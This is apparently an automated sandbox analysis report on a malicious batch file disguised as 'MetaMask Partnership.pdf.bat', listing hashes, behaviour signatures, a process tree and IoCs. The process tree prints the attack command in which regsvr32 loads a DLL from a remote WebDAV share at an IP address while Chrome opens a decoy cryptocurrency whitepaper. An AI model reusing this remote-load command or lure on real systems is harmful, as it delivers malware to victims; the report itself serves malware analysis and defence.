5bd3be9405819229934a4acbb06904937e53ec13e5b87736478031d2c6d38c1f

Analysis

max time kernel
599s
max time network
492s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
21/08/2023, 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MetaMask Partnership.pdf.bat
Size

157B
MD5

6a03d15802a8d61952739fcb12264885
SHA1

9f3029848c534f9cbf99b379397280327ab1461b
SHA256

5bd3be9405819229934a4acbb06904937e53ec13e5b87736478031d2c6d38c1f
SHA512

55dff3b6b9858c79ffae99b03e434baf93dcbb5c47430608c840ad3a3b9c0523eda82c0774bbe1856c2e48665172373591277d894914118350af8bf25f87ea9b

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133370960650516813"	chrome.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4372	chrome.exe
4372	chrome.exe
4760	chrome.exe
4760	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe
Token: SeShutdownPrivilege	4372	chrome.exe
Token: SeCreatePagefilePrivilege	4372	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe
4372	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3816 wrote to memory of 220	3816	cmd.exe	82
PID 3816 wrote to memory of 220	3816	cmd.exe	82
PID 3816 wrote to memory of 220	3816	cmd.exe	82
PID 3816 wrote to memory of 4372	3816	cmd.exe	83
PID 3816 wrote to memory of 4372	3816	cmd.exe	83
PID 4372 wrote to memory of 1496	4372	chrome.exe	85
PID 4372 wrote to memory of 1496	4372	chrome.exe	85
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 3780	4372	chrome.exe	88
PID 4372 wrote to memory of 4464	4372	chrome.exe	89
PID 4372 wrote to memory of 4464	4372	chrome.exe	89
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90
PID 4372 wrote to memory of 992	4372	chrome.exe	90

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MetaMask Partnership.pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3816
- C:\Windows\SysWoW64\regsvr32.exe
  C:\Windows\SysWoW64\regsvr32.exe \\139.99.32.95@8000\DavWWWRoot\1.dll
  2⤵
  PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.exodus.com/assets/docs/binance-coin-whitepaper.pdf
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff833b69758,0x7ff833b69768,0x7ff833b69778
    3⤵
    PID:1496
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:2
    3⤵
    PID:3780
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:8
    3⤵
    PID:4464
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:8
    3⤵
    PID:992
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2844 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:1
    3⤵
    PID:2020
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2868 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:1
    3⤵
    PID:4152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4584 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:1
    3⤵
    PID:1932
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --pdf-renderer --lang=en-US --js-flags=--jitless --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4820 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:1
    3⤵
    PID:2188
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:8
    3⤵
    PID:2444
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:8
    3⤵
    PID:3616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:8
    3⤵
    PID:2968
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1096 --field-trial-handle=1872,i,4854827249257389251,9101700287866800983,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4760

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1013B

MD5
4be53e428d5addf6609a0f4a6d511e20

SHA1
b94a307bbac864776bd2d027d400aafc178b36d2

SHA256
bb32adbea38190a06c6ac402329ea29c9dbbb8b319dbbd2549a71efe0ffc0166

SHA512
462ba095191a8595e94ecfa9022772ff0be32c66e612c27ac3834a8ea4067d0eb941272affd9b8d0d2b55236216a016a6b658f39883c733e443647ce1f5cb30b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
538B

MD5
826d7d29531fee865745190d7f90d3f0

SHA1
9588ae3e173baf69747f5b9444c92ecc9158acdc

SHA256
f5b4b23b8b1595498bdf8be205fc134accda9f3e7a7303f577076e5ffd51d003

SHA512
5b3e6858906c6083d31acd597f466dd8441554959ea01a4e3d5347714dc221b5034bc08ef84a0f38ffaa5b9c659cb342b5f708fc4eaaa27d0c07bbc3a6d78a32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
82b98c28ceebb8dff3325b912895f130

SHA1
a23c99d136a6c11dade19d9b9395cf650dcbcc11

SHA256
9305a170483e243a95d4534e021bf6027f4336f63073304c3fb67be76427db05

SHA512
b3e03a9524f1ba6ad69c4f36a9d4b64458cfb6215bbc2d257c2bfc87417da70572c461a707cf572121ab163a03ce0863b26e97b47348179fc6ad59755aefee3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
8bd063131b31921311b20597628f4429

SHA1
2e5b41b02a4c45bc39e50c9870aac9762c038e3e

SHA256
22c55072b9fb3016f7542a59753a8aed13903ede3419a25d4ce3ad6b4a276e3a

SHA512
4dff7c6595aedc366796db7f7991694205cb67d1c6dbd775bf068eff9e35970995ca4ce9779c727bc23258f3c2026df2284d3c4e06d61f67b8f317486664a35b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
176KB

MD5
22c4b5e9f126874c0256cb4873550e54

SHA1
4a60a680d96c0320d0a3ae60e3c59395750454ba

SHA256
d597934f618c644d455372dd48cc9d1d166a76339387e554f15e32116fe27f24

SHA512
2acfc27121afb79cca69aff4f19519189801ab6d2f361e6fc31734f5d6b0e690f42ba431a31a7c5de9747f2a7133e4ebc4e6d27dcf400a0d170d3f78a9f3d999

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit